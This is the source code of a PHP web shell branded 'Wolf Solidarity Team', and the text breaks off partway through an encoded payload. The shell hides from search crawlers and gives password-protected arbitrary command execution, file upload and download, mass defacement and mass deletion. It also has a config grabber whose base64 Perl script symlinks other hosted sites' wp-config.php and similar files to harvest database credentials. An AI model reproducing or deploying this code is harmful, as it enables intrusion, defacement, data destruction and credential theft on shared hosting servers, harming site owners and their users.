SHELL WST

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12.  
13. $auth_pass = "f1a9606104d2d32ec809d3fafde84694"; //default: wst
14. $color = "red";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21. header('HTTP/1.0 404 Not Found');
22. exit;
23. }
24. }
25.  
26. function login_shell() {
27. ?>
28. <html>
29. <head>
30. <title>Wolf Solidarity Team</title>
31. <link rel="SHORTCUT ICON" href="http://oi68.tinypic.com/2r2myjr.jpg">
32. <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
33. <style type="text/css">
34. html {
35. margin: 20px auto;
36. background: #000000;
37. color: #3BFF14;
38. text-align: center;
39. }
40. header {
41. color: green;
42. margin: 10px auto;
43. }
44. input[type=password] {
45. width: 250px;
46. height: 25px;
47. color: white;
48. background: #000000;
49. border:hidden;
50. padding: 5px;
51. margin-left: 20px;
52. text-align: center;
53. }
54. .typed-cursor{
55. opacity: 1;
56. font-weight: 100;
57. -webkit-animation: blink 0.7s infinite;
58. -moz-animation: blink 0.7s infinite;
59. -ms-animation: blink 0.7s infinite;
60. -o-animation: blink 0.7s infinite;
61. animation: blink 0.7s infinite;
62. }
63. @-keyframes blink{
64. 0% { opacity:1; }
65. 50% { opacity:0; }
66. 100% { opacity:1; }
67. }
68. @-webkit-keyframes blink{
69. 0% { opacity:1; }
70. 50% { opacity:0; }
71. 100% { opacity:1; }
72. }
73. @-moz-keyframes blink{
74. 0% { opacity:1; }
75. 50% { opacity:0; }
76. 100% { opacity:1; }
77. }
78. @-ms-keyframes blink{
79. 0% { opacity:1; }
80. 50% { opacity:0; }
81. 100% { opacity:1; }
82. }
83. @-o-keyframes blink{
84. 0% { opacity:1; }
85. 50% { opacity:0; }
86. 100% { opacity:1; }
87. }
88.  
89. .typed-fade-out{
90. opacity: 0;
91. animation: 0;
92. transition: opacity .25s;
93. }
94. h1{
95. color:#fff;
96. }
97. h2{
98. color:red;
99. }
100. span{
101. color: #03FF30;
102. font-family: System, Geneva, sans-serif;
103. }
104. </style>
105. </head>
106. <center>
107. <header>
108. <center>
109. <form method="post">
110. <input type="password" name="pass">
111. </form>
112. </center>
113. <center><img src="http://oi68.tinypic.com/2r2myjr.jpg" width="400" height="400"></center>
114. <br>
115. <div class="wrap">
116. <h1 class="h1">Wolf Solidarity Team</h1><br>
117. </header>
118. <?php
119. exit;
120. }
121. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
122. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
123. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
124. else
125. login_shell();
126. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
127. @ob_clean();
128. $file = $_GET['file'];
129. header('Content-Description: File Transfer');
130. header('Content-Type: application/octet-stream');
131. header('Content-Disposition: attachment; filename="'.basename($file).'"');
132. header('Expires: 0');
133. header('Cache-Control: must-revalidate');
134. header('Pragma: public');
135. header('Content-Length: ' . filesize($file));
136. readfile($file);
137. exit;
138. }
139. ?>
140. <title>Wolf Solidarity Team Shell</title>
141. <meta name='author' content='Wolf Solidarity Team'>
142. <link rel="SHORTCUT ICON" href="http://oi68.tinypic.com/2r2myjr.jpg">
143. <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
144. <meta charset="UTF-8">
145. <style type='text/css'>
146. @import url(https://fonts.googleapis.com/css?family=System, Geneva, sans-serif);
147. html {
148. background: #000000;
149. color: #ffffff;
150. font-family: 'System, Geneva, sans-serif';
151. font-size: 15px;
152. width: 100%;
153. }
154. hr{
155. color: red;
156. }
157. li {
158. display: inline;
159. margin: 5px;
160. padding: 5px;
161. }
162. table, th, td {
163. border-collapse:collapse;
164. font-family: System, Geneva, sans-serif;
165. background: transparent;
166. font-family: 'System, Geneva, sans-serif';
167. font-size: 15px;
168. }
169. .table_home, .th_home, .td_home {
170. border: 1px solid red;
171. }
172. th {
173. padding: 10px;
174. }
175. a {
176. color: #ffffff;
177. text-decoration: none;
178. }
179. a:hover {
180. text-decoration: underline;
181. }
182. b {
183. color: gold;
184. }
185. input[type=text], input[type=password],input[type=submit] {
186. background: transparent;
187. color: white;
188. border: 1px solid red;
189. margin: 5px auto;
190. padding-left: 5px;
191. font-family: 'System, Geneva, sans-serif';
192. font-size: 15px;
193. }
194. textarea {
195. border: 1px solid red;
196. width: 100%;
197. height: 400px;
198. padding-left: 5px;
199. margin: 10px auto;
200. resize: none;
201. background: transparent;
202. color: #ffffff;
203. font-family: 'System, Geneva, sans-serif';
204. font-size: 15px;
205. }
206. select {
207. width: 152px;
208. background: #000000;
209. color: red;
210. border: 1px solid #ffffff;
211. margin: 5px auto;
212. padding-left: 5px;
213. font-family: 'System, Geneva, sans-serif';
214. font-size: 15px;
215. }
216. option:hover {
217. background: black;
218. color: #000000;
219. }
220. </style>
221. </head>
222. <?php
223. function w($dir,$perm) {
224. if(!is_writable($dir)) {
225. return "<font color=red>".$perm."</font>";
226. } else {
227. return "<font color=white>".$perm."</font>";
228. }
229. }
230. function r($dir,$perm) {
231. if(!is_readable($dir)) {
232. return "<font color=red>".$perm."</font>";
233. } else {
234. return "<font color=blue>".$perm."</font>";
235. }
236. }
237. function exe($cmd) {
238. if(function_exists('system')) {
239. @ob_start();
240. @system($cmd);
241. $buff = @ob_get_contents();
242. @ob_end_clean();
243. return $buff;
244. } elseif(function_exists('exec')) {
245. @exec($cmd,$results);
246. $buff = "";
247. foreach($results as $result) {
248. $buff .= $result;
249. } return $buff;
250. } elseif(function_exists('passthru')) {
251. @ob_start();
252. @passthru($cmd);
253. $buff = @ob_get_contents();
254. @ob_end_clean();
255. return $buff;
256. } elseif(function_exists('shell_exec')) {
257. $buff = @shell_exec($cmd);
258. return $buff;
259. }
260. }
261. function perms($file){
262. $perms = fileperms($file);
263. if (($perms & 0xC000) == 0xC000) {
264. // Socket
265. $info = 's';
266. } elseif (($perms & 0xA000) == 0xA000) {
267. // Symbolic Link
268. $info = 'l';
269. } elseif (($perms & 0x8000) == 0x8000) {
270. // Regular
271. $info = '-';
272. } elseif (($perms & 0x6000) == 0x6000) {
273. // Block special
274. $info = 'b';
275. } elseif (($perms & 0x4000) == 0x4000) {
276. // Directory
277. $info = 'd';
278. } elseif (($perms & 0x2000) == 0x2000) {
279. // Character special
280. $info = 'c';
281. } elseif (($perms & 0x1000) == 0x1000) {
282. // FIFO pipe
283. $info = 'p';
284. } else {
285. // Unknown
286. $info = 'u';
287. }
288. // Owner
289. $info .= (($perms & 0x0100) ? 'r' : '-');
290. $info .= (($perms & 0x0080) ? 'w' : '-');
291. $info .= (($perms & 0x0040) ?
292. (($perms & 0x0800) ? 's' : 'x' ) :
293. (($perms & 0x0800) ? 'S' : '-'));
294. // Group
295. $info .= (($perms & 0x0020) ? 'r' : '-');
296. $info .= (($perms & 0x0010) ? 'w' : '-');
297. $info .= (($perms & 0x0008) ?
298. (($perms & 0x0400) ? 's' : 'x' ) :
299. (($perms & 0x0400) ? 'S' : '-'));
300. // World
301. $info .= (($perms & 0x0004) ? 'r' : '-');
302. $info .= (($perms & 0x0002) ? 'w' : '-');
303. $info .= (($perms & 0x0001) ?
304. (($perms & 0x0200) ? 't' : 'x' ) :
305. (($perms & 0x0200) ? 'T' : '-'));
306. return $info;
307. }
308. function hdd($s) {
309. if($s >= 1073741824)
310. return sprintf('%1.2f',$s / 1073741824 ).' GB';
311. elseif($s >= 1048576)
312. return sprintf('%1.2f',$s / 1048576 ) .' MB';
313. elseif($s >= 1024)
314. return sprintf('%1.2f',$s / 1024 ) .' KB';
315. else
316. return $s .' B';
317. }
318. function ambilKata($param, $kata1, $kata2){
319. if(strpos($param, $kata1) === FALSE) return FALSE;
320. if(strpos($param, $kata2) === FALSE) return FALSE;
321. $start = strpos($param, $kata1) + strlen($kata1);
322. $end = strpos($param, $kata2, $start);
323. $return = substr($param, $start, $end - $start);
324. return $return;
325. }
326. function getsource($url) {
327. $curl = curl_init($url);
328. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
329. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
330. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
331. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
332. $content = curl_exec($curl);
333. curl_close($curl);
334. return $content;
335. }
336. function bing($dork) {
337. $npage = 1;
338. $npages = 30000;
339. $allLinks = array();
340. $lll = array();
341. while($npage <= $npages) {
342. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
343. if($x) {
344. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
345. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
346. $npage = $npage + 10;
347. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
348. } else break;
349. }
350. $URLs = array();
351. foreach($allLinks as $url){
352. $exp = explode("/", $url);
353. $URLs[] = $exp[2];
354. }
355. $array = array_filter($URLs);
356. $array = array_unique($array);
357. $sss = count(array_unique($array));
358. foreach($array as $domain) {
359. echo $domain."\n";
360. }
361. }
362. function reverse($url) {
363. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
364. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
365. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
366. curl_setopt($ch, CURLOPT_HEADER, 0);
367. curl_setopt($ch, CURLOPT_POST, 1);
368. $resp = curl_exec($ch);
369. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
370. $array = explode(",,", $resp);
371. unset($array[0]);
372. foreach($array as $lnk) {
373. $lnk = "http://$lnk";
374. $lnk = str_replace(",", "", $lnk);
375. echo $lnk."\n";
376. ob_flush();
377. flush();
378. }
379. curl_close($ch);
380. }
381. if(get_magic_quotes_gpc()) {
382. function idx_ss($array) {
383. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
384. }
385. $_POST = idx_ss($_POST);
386. $_COOKIE = idx_ss($_COOKIE);
387. }
388.  
389. if(isset($_GET['dir'])) {
390. $dir = $_GET['dir'];
391. chdir($dir);
392. } else {
393. $dir = getcwd();
394. }
395. $kernel = php_uname();
396. $ip = gethostbyname($_SERVER['HTTP_HOST']);
397. $dir = str_replace("\\","/",$dir);
398. $scdir = explode("/", $dir);
399. $freespace = hdd(disk_free_space("/"));
400. $total = hdd(disk_total_space("/"));
401. $used = $total - $freespace;
402. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
403. $ds = @ini_get("disable_functions");
404. $mysql = (function_exists('mysql_connect')) ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
405. $curl = (function_exists('curl_version')) ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
406. $wget = (exe('wget --help')) ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
407. $perl = (exe('perl --help')) ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
408. $python = (exe('python --help')) ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
409. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=red>NONE</font>";
410. if(!function_exists('posix_getegid')) {
411. $user = @get_current_user();
412. $uid = @getmyuid();
413. $gid = @getmygid();
414. $group = "?";
415. } else {
416. $uid = @posix_getpwuid(posix_geteuid());
417. $gid = @posix_getgrgid(posix_getegid());
418. $user = $uid['name'];
419. $uid = $uid['uid'];
420. $group = $gid['name'];
421. $gid = $gid['gid'];
422. }
423. echo "<hr>";
424. echo "<center>";
425. echo "<ul>";
426. echo "<li>:: <a href='?'>LOKASI SHELL</a> ::</li>";
427. echo "<li>:: <a href='?dir=$dir&do=cmd'>COMMAND</a> ::</li>";
428. echo "<li>:: <a href='?dir=$dir&do=upload'>UPLOAD FILE</a> ::</li>";
429. echo "<li>:: <a href='?dir=$dir&do=config'>CONFIG</a> ::</li>";
430. echo "<li>:: <a href='?dir=$dir&do=jumping'>JUMPING</a> ::</li>";
431. echo "<li>:: <a style='color: red;' href='?logout=true'>KELUAR</a> ::</li>";
432. echo "</ul>";
433. echo "<hr>";
434. echo "</center>";
435. echo "<br>";
436. echo "DIREKTORI : ";
437. foreach($scdir as $c_dir => $cdir) {
438. echo "<a href='?dir=";
439. for($i = 0; $i <= $c_dir; $i++) {
440. echo $scdir[$i];
441. if($i != $c_dir) {
442. echo "/";
443. }
444. }
445. echo "'>$cdir</a>/";
446. }
447. if($_GET['logout'] == true) {
448. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
449. echo "<script>window.location='?';</script>";
450. } elseif($_GET['do'] == 'upload') {
451. echo "<center>";
452. if($_POST['upload']) {
453. if($_POST['tipe_upload'] == 'biasa') {
454. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
455. $act = "<font color=red>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
456. } else {
457. $act = "<font color=red>failed to upload file</font>";
458. }
459. } else {
460. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
461. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
462. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
463. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
464. $act = "<font color=red>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
465. } else {
466. $act = "<font color=red>failed to upload file</font>";
467. }
468. } else {
469. $act = "<font color=red>failed to upload file</font>";
470. }
471. }
472. }
473. echo "Upload File:
474. <form method='post' enctype='multipart/form-data'>
475. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
476. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br> <input type='file' name='ix_file'>
477. <input type='submit' value='upload' name='upload'>
478. </form>";
479. echo $act;
480. echo "</center>";
481. } elseif($_GET['do'] == 'cmd') {
482. echo "<form method='post'>
483. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
484. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
485. </form>";
486. if($_POST['do_cmd']) {
487. echo "<pre>".exe($_POST['cmd'])."</pre>";
488. }
489. } elseif($_GET['do'] == 'mass_deface') {
490. function sabun_massal($dir,$namafile,$isi_script) {
491. if(is_writable($dir)) {
492. $dira = scandir($dir);
493. foreach($dira as $dirb) {
494. $dirc = "$dir/$dirb";
495. $lokasi = $dirc.'/'.$namafile;
496. if($dirb === '.') {
497. file_put_contents($lokasi, $isi_script);
498. } elseif($dirb === '..') {
499. file_put_contents($lokasi, $isi_script);
500. } else {
501. if(is_dir($dirc)) {
502. if(is_writable($dirc)) {
503. echo "[<font color=red>DONE</font>] $lokasi<br>";
504. file_put_contents($lokasi, $isi_script);
505. $idx = sabun_massal($dirc,$namafile,$isi_script);
506. }
507. }
508. }
509. }
510. }
511. }
512. function sabun_biasa($dir,$namafile,$isi_script) {
513. if(is_writable($dir)) {
514. $dira = scandir($dir);
515. foreach($dira as $dirb) {
516. $dirc = "$dir/$dirb";
517. $lokasi = $dirc.'/'.$namafile;
518. if($dirb === '.') {
519. file_put_contents($lokasi, $isi_script);
520. } elseif($dirb === '..') {
521. file_put_contents($lokasi, $isi_script);
522. } else {
523. if(is_dir($dirc)) {
524. if(is_writable($dirc)) {
525. echo "[<font color=red>DONE</font>] $dirb/$namafile<br>";
526. file_put_contents($lokasi, $isi_script);
527. }
528. }
529. }
530. }
531. }
532. }
533. if($_POST['start']) {
534. if($_POST['tipe_sabun'] == 'mahal') {
535. echo "<div style='margin: 5px auto; padding: 5px'>";
536. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
537. echo "</div>";
538. } elseif($_POST['tipe_sabun'] == 'murah') {
539. echo "<div style='margin: 5px auto; padding: 5px'>";
540. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
541. echo "</div>";
542. }
543. } else {
544. echo "<center>";
545. echo "<form method='post'>
546. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
547. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
548. <font style='text-decoration: underline;'>Folder:</font><br>
549. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
550. <font style='text-decoration: underline;'>Filename:</font><br>
551. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
552. <font style='text-decoration: underline;'>Index File:</font><br>
553. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
554. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
555. </form></center>";
556. }
557. } elseif($_GET['do'] == 'mass_delete') {
558. function hapus_massal($dir,$namafile) {
559. if(is_writable($dir)) {
560. $dira = scandir($dir);
561. foreach($dira as $dirb) {
562. $dirc = "$dir/$dirb";
563. $lokasi = $dirc.'/'.$namafile;
564. if($dirb === '.') {
565. if(file_exists("$dir/$namafile")) {
566. unlink("$dir/$namafile");
567. }
568. } elseif($dirb === '..') {
569. if(file_exists("".dirname($dir)."/$namafile")) {
570. unlink("".dirname($dir)."/$namafile");
571. }
572. } else {
573. if(is_dir($dirc)) {
574. if(is_writable($dirc)) {
575. if(file_exists($lokasi)) {
576. echo "[<font color=red>DELETED</font>] $lokasi<br>";
577. unlink($lokasi);
578. $idx = hapus_massal($dirc,$namafile);
579. }
580. }
581. }
582. }
583. }
584. }
585. }
586. if($_POST['start']) {
587. echo "<div style='margin: 5px auto; padding: 5px'>";
588. hapus_massal($_POST['d_dir'], $_POST['d_file']);
589. echo "</div>";
590. } else {
591. echo "<center>";
592. echo "<form method='post'>
593. <font style='text-decoration: underline;'>Folder:</font><br>
594. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
595. <font style='text-decoration: underline;'>Filename:</font><br>
596. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
597. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
598. </form></center>";
599. }
600. } elseif($_GET['do'] == 'config') {
601. $idx = mkdir("idx_config", 0777);
602. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
603. $htc = fopen("idx_config/.htaccess","w");
604. fwrite($htc, $isi_htc);
605. fclose($htc);
606. if(preg_match("/vhosts|vhost/", $dir)) {
607. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
608. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY